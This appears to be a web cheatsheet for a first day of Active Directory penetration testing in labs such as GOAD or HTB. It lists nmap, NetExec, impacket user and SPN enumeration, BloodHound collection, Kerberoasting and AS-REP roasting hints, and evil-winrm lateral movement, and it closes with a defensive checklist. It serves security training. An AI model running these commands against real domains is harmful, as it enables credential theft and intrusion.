All cheatsheets

Cheatsheet · advanced

AD first day

Lab-oriented first foothold → enum → BloodHound loop without random spraying.

Authorized testing only. Practice on systems you own, isolated labs, or targets with written permission. Unauthorized access is illegal.

active-directory
impacket
bloodhound

Situational awareness

Authorized AD lab only (GOAD, HTB, THM, etc.).

Command
nmap -sV -p 53,88,135,139,389,445,636,3268,3389 DC_IP
Command
nxc smb DC_IP -u user -p pass  # or crackmapexec
Command
nxc smb DC_IP -u user -p pass --shares

Domain enum (creded)

Command
impacket-GetADUsers -all domain/user:pass@DC
Command
impacket-GetUserSPNs domain/user:pass@DC -request
Command
bloodhound-python -d domain.local -u user -p pass -ns DC_IP -c All

Common next paths (lab)

Command
# Kerberoast → hashcat -m 13100
Command
# AS-REP roast if preauth disabled
Command
# SMB/WinRM lateral with found creds
Command
evil-winrm -i HOST -u user -p pass

Checklist

  • Lab snapshot taken before noisy actions
  • BloodHound path explained in notes before exploit
  • No password spray outside agreed rates
  • Defenses written for each successful step